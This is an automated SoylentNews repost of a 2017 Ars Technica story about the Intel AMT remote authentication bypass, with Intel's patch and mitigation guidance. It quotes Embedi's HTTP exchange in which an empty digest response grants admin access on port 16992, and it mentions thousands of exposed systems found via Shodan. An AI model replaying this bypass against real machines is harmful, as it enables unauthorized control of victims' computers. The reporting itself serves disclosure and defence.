SoylentNews

"exec" writes:

Story automatically generated by StoryBot Version 0.2.2 rel Testing.
Storybot ('Arthur T Knackerbracket') has been converted to Python3

Note: This is the complete story and will need further editing. It may also be covered
by Copyright and thus should be acknowledged and quoted rather than printed in its entirety.

FeedSource: [HackerNews]

Time: 2017-05-07 03:48:11 UTC

Original URL: https://arstechnica.com/security/2017/05/the-hijacking-flaw-that-lurked-in-intel-chips-is-worse-than-anyone-thought/ [arstechnica.com] using UTF-8 encoding.

Title: The hijacking flaw that lurked in Intel chips is worse than anyone thought

--- --- --- --- --- --- --- Entire Story Below --- --- --- --- --- --- ---

The hijacking flaw that lurked in Intel chips is worse than anyone thought

Arthur T Knackerbracket has found the following story [arstechnica.com]:

A remote hijacking flaw that lurked in Intel chips for seven years was more severe than many people imagined, because it allowed hackers to remotely gain administrative control over huge fleets of computers without entering a password. This is according to technical analyses published Friday.

AMT, which is available with many vPro processors, was set up to require a password before it could be remotely accessed over a Web browser interface. But, remarkably, that authentication mechanism can be bypassed by entering any text string—or no text at all. According to a blog post published Friday [tenable.com] by Tenable Network Security, the cryptographic hash that the interface's digest access authentication [wikipedia.org] requires to verify someone is authorized to log in can be anything at all, including no string at all.

"Authentication still worked" even when the wrong hash was entered, Tenable Director of Reverse Engineering Carlos Perez wrote. "We had discovered a complete bypass of the authentication scheme."

A separate technical analysis from Embedi, the security firm Intel credited with first disclosing the vulnerability, arrived at the same conclusion. It stated:

With a little help of the local proxy at `127.0.0.1:16992`, which is

meant to replace the response with an empty string, we're able to manage the AMT via the regular Web browser as if we've known the *admin* password:

```

GET /index.htm HTTP/1.1

Host: 127.0.0.1:16992

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101

Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

HTTP/1.1 401 Unauthorized

WWW-Authenticate: Digest

realm="Digest:048A0000000000000000000000000000",

nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"

Content-Type: text/html

Server: AMT

Content-Length: 678

Connection: close

GET /index.htm HTTP/1.1

Host: 127.0.0.1:16992

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101

Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Authorization: Digest username="admin",

realm="Digest:048A0000000000000000000000000000",

nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="",

qop=auth, nc=00000001, cnonce="60513ab58858482c"

HTTP/1.1 200 OK

Date: Thu, 4 May 2017 16:09:17 GMT

Server: AMT

Content-Type: text/html

Transfer-Encoding: chunked

Cache-Control: no cache

Expires: Thu, 26 Oct 1995 00:00:00 GMT

04E6

Embedi e-mailed the analysis to reporters, but didn't publish it online.

Making matters worse, unauthorized accesses typically aren't logged by the PC because AMT has direct access to the computer's network hardware. When AMT is enabled, all network packets are redirected to the Intel Management Engine and from there to the AMT. The packets bypass the OS completely. The vulnerable management features were made available in some but not all Intel chipsets starting in 2010, Embedi has said.

In a blog post published Friday [intel.com], Intel officials said they expect PC makers to release a patch next week. The releases will update Intel firmware, meaning patching will require that each vulnerable chip set is reflashed. In the meantime, Intel is urging customers to download and run this discovery tool [intel.com] to diagnose potentially vulnerable computers. Systems that test positive should be temporarily secured using this mitigation guide [intel.com] until a patch is supplied. Computer makers Fujitsu [fujitsu.com], HP [hp.com], and Lenovo [lenovo.com], have also issued advisories for specific models they sell.

[Update, 5:40pm EDT] A query of the Shodan security search engine [shodan.io] found over 8,500 systems with the AMT interface exposed to the Internet, with over 2,000 in the United States alone:

Enlarge [arstechnica.net] / One of the hits for the AMT interface on Shodan.

Shodan [shodan.io]

Many others may be accessible via organizational networks.

-- submitted from IRC

Original Submission